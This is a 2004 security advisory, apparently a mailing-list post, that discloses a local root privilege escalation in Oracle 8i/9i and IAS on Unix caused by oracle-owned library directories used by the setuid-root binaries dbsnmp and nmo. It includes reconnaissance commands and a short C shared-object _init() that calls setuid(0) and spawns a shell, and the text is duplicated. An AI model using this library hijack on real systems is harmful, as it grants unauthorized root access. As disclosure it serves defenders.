* Title:* Local Vulnerability in Oracle Products. RDBMS, IAs, etc
*All Versions*. (10g not tested)
* Date:* 10-05-2004
* Platform:* Tested in Linux, Solaris & HP-UX but can be exported to others.
* Impact:* Privilege elevation from oracle products installation owner
(usually called oracle or ias ) to root.
* Author:* Juan Manuel Pascual Escriba <mailto:jmpascual (at) open3s (dot) com [email concealed]>
* Status:* Vendor contacted details below.
*INTRODUCTION:*
Oracle Corporation (nasdaqNM - ORCL) is a world leading database software developer,
claiming to develop an unbreakable software. It's products are targeted in database,
application server and data mining market.
*PROBLEM SUMMARY:*
This software version
- Oracle 8i Linux Platform
- Oracle 9i Linux Platform
- Oracle 8i HP-UX Platform
- Oracle 9i Solaris Platform
- Oracle IAS 9.0.2.0.1 with patchset v9.0.2.3
- All versions tested in Unix platform (Universal?¿)
are suitable to privilege elevation from oracle software owner ( normally oracle,ias,
iasr2) to root.
*DESCRIPTION*
Oracle Libraries are installed owned by oracle in a default installation of the products
commented above.
[pask@dimoniet home]$ ls -alc /export/home/iasr2/ora9ias_mid
...
drwxr-xr-x 3 iasr2 dba 512 Nov 21 14:04 lbs
drwxr-xr-x 15 iasr2 dba 512 Jan 7 12:13 ldap
drwxr-xr-x 3 iasr2 dba 12800 Nov 21 11:22 lib
drwxr-xr-x 13 iasr2 dba 512 Nov 21 14:04 network
drwxr-xr-x 3 iasr2 dba 512 Nov 21 14:04 ocommon
...
As you can see, the lib directory owner is iasr2, let's look for some setuid binaries
ups, it's not posible to achieve root privileges with this binary and by this way
For iasr2 user is too easy to create a so.lib, something like
#include
#include
_init() {
printf("en el _init()\n");
printf("Con PID=%i y EUID=%i",getpid(),getuid());
setuid(0);
system("/usr/bin/ksh");
printf("Saliendo del Init()\n");
}
*IMPACT*
oracle,ias,iasr2 or iasdb users with local access can gain root privileges through
oracle installation
*EXPLOIT*
commented above.
*WORKAROUND*
chown to root lib directory and parent directory.
*STATUS*
Oracle Security Alerts explains in an email sent 26/07/2004 that "Oracle believes that
only trusted users should have access to the local iasdb user account".
I have no information about a patch or a solution from Oracle Corp.
--------------------------------------------------
This vulnerability was researched by:
Juan Manuel Pascual Escriba jmpascual (at) open3s (dot) com [email concealed]
Barcelona - Denia - Spain http://www.open3s.com
*
* Title:* Local Vulnerability in Oracle Products. RDBMS, IAs, etc
*All Versions*. (10g not tested)
* Date:* 10-05-2004
* Platform:* Tested in Linux, Solaris & HP-UX but can be exported to others.
* Impact:* Privilege elevation from oracle products installation owner
(usually called oracle or ias ) to root.
* Author:* Juan Manuel Pascual Escriba <mailto:jmpascual (at) open3s (dot) com [email concealed]>
* Status:* Vendor contacted details below.
*INTRODUCTION:*
Oracle Corporation (nasdaqNM - ORCL) is a world leading database software developer,
claiming to develop an unbreakable software. It's products are targeted in database,
application server and data mining market.
*PROBLEM SUMMARY:*
This software version
- Oracle 8i Linux Platform
- Oracle 9i Linux Platform
- Oracle 8i HP-UX Platform
- Oracle 9i Solaris Platform
- Oracle IAS 9.0.2.0.1 with patchset v9.0.2.3
- All versions tested in Unix platform (Universal?¿)
are suitable to privilege elevation from oracle software owner ( normally oracle,ias,
iasr2) to root.
*DESCRIPTION*
Oracle Libraries are installed owned by oracle in a default installation of the products
commented above.
[pask@dimoniet home]$ ls -alc /export/home/iasr2/ora9ias_mid
...
drwxr-xr-x 3 iasr2 dba 512 Nov 21 14:04 lbs
drwxr-xr-x 15 iasr2 dba 512 Jan 7 12:13 ldap
drwxr-xr-x 3 iasr2 dba 12800 Nov 21 11:22 lib
drwxr-xr-x 13 iasr2 dba 512 Nov 21 14:04 network
drwxr-xr-x 3 iasr2 dba 512 Nov 21 14:04 ocommon
...
As you can see, the lib directory owner is iasr2, let's look for some setuid binaries
[pask@dimoniet ora9ias_mid]$ find ./ -perm +4000
./bin/dbsnmp
./bin/nmo
[iasr2@dimoniet ora9ias_mid]$ ls -alc ./bin/dbsnmp
-rwsr-s--- 1 root dba 2900980 Nov 21 14:04 ./bin/dbsnmp
[iasr2@dimoniet ora9ias_mid]$ ls -alc ./bin/nmo
-rwsr-s--- 1 root dba 12632 Nov 21 14:04 ./bin/nmo
And now, just could see the shared objects that the binaries depends.
[iasr2@dimoniet ora9ias_mid]$ ldd ./bin/dbsnmp
libvppdc.so => /export/home/iasr2/ora9ias_mid/lib/libvppdc.so
libclntsh.so.9.0 => /export/home/iasr2/ora9ias_mid/lib/libclntsh.so.9.0
libwtc9.so => /export/home/iasr2/ora9ias_mid/lib//libwtc9.so
libthread.so.1 => /usr/lib/libthread.so.1
libkstat.so.1 => /usr/lib/libkstat.so.1
....
[iasr2@dimoniet ora9ias_mid]$ ldd ./bin/nmo
libnsl.so.1 => /usr/lib/libnsl.so.1
libsocket.so.1 => /usr/lib/libsocket.so.1
libgen.so.1 => /usr/lib/libgen.so.1
.....
ups, it's not posible to achieve root privileges with this binary and by this way
For iasr2 user is too easy to create a so.lib, something like
#include
#include
_init() {
printf("en el _init()\n");
printf("Con PID=%i y EUID=%i",getpid(),getuid());
setuid(0);
system("/usr/bin/ksh");
printf("Saliendo del Init()\n");
}
*IMPACT*
oracle,ias,iasr2 or iasdb users with local access can gain root privileges through
oracle installation
*EXPLOIT*
commented above.
*WORKAROUND*
chown to root lib directory and parent directory.
*STATUS*
Oracle Security Alerts explains in an email sent 26/07/2004 that "Oracle believes that
only trusted users should have access to the local iasdb user account".
I have no information about a patch or a solution from Oracle Corp.
--------------------------------------------------
This vulnerability was researched by:
Juan Manuel Pascual Escriba jmpascual (at) open3s (dot) com [email concealed]
Barcelona - Denia - Spain http://www.open3s.com
[ reply ]